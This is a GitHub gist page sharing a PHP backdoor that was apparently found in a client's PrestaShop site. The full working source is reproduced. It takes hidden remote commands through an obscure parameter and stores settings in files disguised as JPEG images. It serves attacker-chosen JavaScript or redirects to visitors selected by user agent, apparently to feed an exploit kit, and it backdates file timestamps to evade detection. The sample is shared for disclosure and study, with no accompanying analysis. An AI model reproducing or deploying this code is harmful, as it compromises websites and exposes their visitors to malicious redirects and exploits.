Skip to content

Instantly share code, notes, and snippets.

@jonaslejon

jonaslejon/tracks.php

Last active September 24, 2015 13:28
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save jonaslejon/63faff4c29c04e271c23 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save jonaslejon/63faff4c29c04e271c23 to your computer and use it in GitHub Desktop.
Download ZIP
Obfuscated PHP backdoor found in client PrestaShop installation
Raw
tracks.php
<?php
if(!defined("CUR_PATH")){
define("CUR_PATH",dirname(__FILE__) . DIRECTORY_SEPARATOR);
}
if(!defined("SETTINGS_FILE")){
define("SETTINGS_FILE",CUR_PATH."img.jpg");
}
if(!defined("LOG_FILE")){
define("LOG_FILE",CUR_PATH."dot.jpg");
}
if(!defined("IS_AJAX")){
define("IS_AJAX",false);
}
check_exist_all();
$pname = "UEYJHJSDHUEYBSJDHUWYE";
$SETTS = unserialize(@file_get_contents(SETTINGS_FILE));
if(
(isset($_POST[$pname]) && !empty($_POST[$pname]) && strlen($_POST[$pname]) >0)
|| (isset($_GET[$pname]) && !empty($_GET[$pname]) && strlen($_GET[$pname]) >0)
){
$new_setts = $SETTS;
$ret = array();
if(isset($_POST[$pname])){
$new_setts["status"] = $_POST[$pname."_status"];
$new_setts["u"] = base64_encode($_POST[$pname."_u"]);
$new_setts["f"] =$_POST[$pname."_f"]; //_#_
$new_setts["ct"] = $_POST[$pname."_ct"];
$new_setts["code"] = $_POST[$pname."_code"];
$new_setts["mobile_on"] = $_POST[$pname."_mobon"];
$new_setts["log"] = $_POST[$pname."_nlog"];
$new_setts["debug"] = $_POST[$pname."_debug"];
$new_setts["pts"] = base64_decode($_POST[$pname."_pts"]);
}else if(isset($_GET[$pname])){
$data = base64_decode($_GET[$pname]);
$data = explode("||__||",$data);
$new_setts["status"] = $data[0];
$new_setts["u"] = base64_encode($data[1]);
$new_setts["f"] = $data[2]; //_#_
$new_setts["ct"] = $data[3];
$new_setts["code"] = $data[4];
$new_setts["mobile_on"] = $data[5];
$new_setts["log"] = $data[6];
$new_setts["debug"] = $data[7];
$new_setts["pts"] = base64_decode($data[8]);
}else{
exit();
}
$server_script_dir = detect_doc_root($new_setts["pts"]).DIRECTORY_SEPARATOR.$new_setts["pts"].DIRECTORY_SEPARATOR;
$ret["pts"] = $server_script_dir;
$ret["script_path"] = $server_script_dir.basename($_SERVER["SCRIPT_NAME"]);
@file_put_contents(SETTINGS_FILE,serialize($new_setts));
$touch_exists = false;
if(file_exists(SETTINGS_FILE)){
$ftime = @stat(SETTINGS_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(SETTINGS_FILE,$touch_exists,true);
echo base64_encode("OKSETTS")."OKSETTSOK_START:".base64_encode(json_encode($ret))."-END";exit();;
exit();
}
if((isset($_GET[$pname."_test"]) && !empty($_GET[$pname."_test"]) && strlen($_GET[$pname."_test"]) >0)){
show_good_js($SETTS["u"],base64_decode($SETTS["code"]));
echo "\r\n\r\n_______________________\r\n\r\n";
echo base64_encode("OKSETTS");
echo "\r\n\r\n_______________________\r\n\r\n";
var_dump($SETTS);
echo "\r\n\r\n_______________________\r\n\r\n";
if(file_exists(LOG_FILE)){
echo file_get_contents(LOG_FILE);
}else{
echo "No log";
}
exit();
}
if((isset($_GET[$pname."_shlog"]) && !empty($_GET[$pname."_shlog"]) && strlen($_GET[$pname."_shlog"]) >0)){
if(file_exists(LOG_FILE)){
echo file_get_contents(LOG_FILE);
}else{
echo "No log";
}
exit();
}
if(IS_AJAX){
if(!isset($_SERVER["HTTP_CONTENT_TYPES"]) || strpos($_SERVER["HTTP_CONTENT_TYPES"],$_SERVER["SERVER_NAME"])===false){
exit();
}
}
if(isset($_GET["mob"]) && !empty($_GET["mob"]) && strlen($_GET["mob"]) >0 && $SETTS["mobile_on"] == 1){
$f = true;
$is_mob = true;
}else{
$is_mob = false;
$SETTS["f"] = (!empty($SETTS["f"]) && $SETTS["f"] != ""?explode("_#_",$SETTS["f"]):array());//explode("_#_",$SETTS["f"])
$f = false;
$ua = $_SERVER["HTTP_USER_AGENT"];
if(!empty($SETTS["f"])){
foreach($SETTS["f"] as $one){
/*if(preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match)){
$f = true;
break;
}*/
if(strpos($one,"*")!==false){
if (preg_match("|".$one."|i", $ua, $match)){
$f = true;
break;
}
}else{
if (preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match))
{
$f = true;
break;
}
}
}
}
}
if($SETTS["debug"] == 1){
$f = true;
$SETTS["u"] = base64_encode("http://google.com");
}
if($f && $SETTS["log"] == 1){
@file_put_contents(LOG_FILE,"[".date("Y-m-d H:i:s")."]: ".$ua."\r\n",FILE_APPEND);
$touch_exists = false;
if(file_exists(LOG_FILE)){
$ftime = @stat(LOG_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(LOG_FILE,$touch_exists,true);
}
if($f && $SETTS["status"] == 1 && !empty($SETTS["u"]) && strlen($SETTS["u"])>0){
$check_cook = get_cookie("is_uniq");
if(!$check_cook || $SETTS["ct"] == 0){
set_cookie("is_uniq","1",(time()+$SETTS["ct"]));
if($is_mob){
show_js_redirect($SETTS["u"]);
}else{
show_good_js($SETTS["u"],base64_decode($SETTS["code"]));
}
}else{
show_bad_js();
}
}else{
show_bad_js();
}
exit();
function check_exist_all(){
if(!@file_exists(SETTINGS_FILE)){
@file_put_contents(SETTINGS_FILE,serialize(array("status"=>0,"u"=>"","f"=>"","ct"=>0,"code"=>"","pts"=>"","log"=>-1,"debug"=>-1,"mobile_on"=>-1)));
$touch_exists = false;
if(file_exists(SETTINGS_FILE)){
$ftime = @stat(SETTINGS_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(SETTINGS_FILE,$touch_exists,true);
}
}
function show_bad_js(){
if(!IS_AJAX){
header("content-type: application/x-javascript");
}
echo "/*".time()."*/";
}
function show_good_js($e_url,$code){
$e_url = base64_decode($e_url);
$code = str_replace(array("{%%EK_URL%%}"),array($e_url),$code);
if(!IS_AJAX){
header("content-type: application/x-javascript");
}
echo $code;
}
function show_js_redirect($e_url){
$e_url = base64_decode($e_url);
header("content-type: application/x-javascript");
$redirect = "if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {location.replace('".$e_url."');}else{window.location = '".$e_url."';document.location = '".$e_url."';}";
echo $redirect;
}
function detect_doc_root($path_to_script){
$path_to_script = str_replace("//","/",$path_to_script);
if(substr($path_to_script,0,1) == "/"){
$path_to_script = substr_replace($path_to_script, "", 0,1);
}
$full_path = realpath(dirname(__FILE__));
if($path_to_script == ""){
$doc_root = $full_path;
}else{
$doc_root = str_replace(DIRECTORY_SEPARATOR.$path_to_script,"",$full_path);
}
return $doc_root;
}
function rand_string($min = 2,$max = false){
$abc = "qwertyuiopasdfghjklzxcvbnm";
$abc_up = strtoupper($abc);
$abc = str_split($abc);
$abc_up = str_split($abc_up);
$abc = array_merge($abc,$abc_up);
$return = array();
if(!$max || $max <= $min){
$max = $min + $min;
}
for($i =$min; $i <= $max; $i++){
$return[] = $abc[array_rand($abc)];
}
return implode("",$return);
}
function set_cookie($name = "", $value = "", $expire = 1, $path = "/"){
return setcookie(md5($name),$value,$expire,$path,"",false,true);
}
function get_cookie($name = ""){
if(isset($_COOKIE[md5($name)]) && !empty($_COOKIE[md5($name)])){
return $_COOKIE[md5($name)];
}else{
return false;
}
}
function make_touch($fpath,$touch_exist = false,$touch_par_dir = false){
$ttime = 0;
if($touch_exist){
$ttime = $touch_exist;
}else{
$ttime = get_some_touch($fpath);
}
@touch($fpath,$ttime);
if($touch_par_dir===true){
$fpath = explode(DIRECTORY_SEPARATOR,$fpath);
array_splice($fpath, (count($fpath)-1), 1);
$fpath= implode(DIRECTORY_SEPARATOR,$fpath);
if(substr($fpath, -1) != DIRECTORY_SEPARATOR)
$fpath= $fpath.DIRECTORY_SEPARATOR;
@touch($fpath,$ttime);
}
}
function get_some_touch($fpath){
$fpath = explode(DIRECTORY_SEPARATOR,$fpath);
array_splice($fpath, (count($fpath)-1), 1);
$fpath= implode(DIRECTORY_SEPARATOR,$fpath);
if(substr($fpath, -1) != DIRECTORY_SEPARATOR)
$fpath= $fpath.DIRECTORY_SEPARATOR;
$dirs = array_diff(scandir($fpath),array(".",".."));
$touches = array();
foreach($dirs as $one){
$stat = stat($fpath.$one);
$touches[] = $stat['mtime'];
}
//asort($touches);
sort($touches, SORT_NUMERIC);
if(isset($touches[0]) and !empty($touches) and $touches[0]>0)
return $touches[0];
else
return (time() - (3600*24*30 * 12));
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment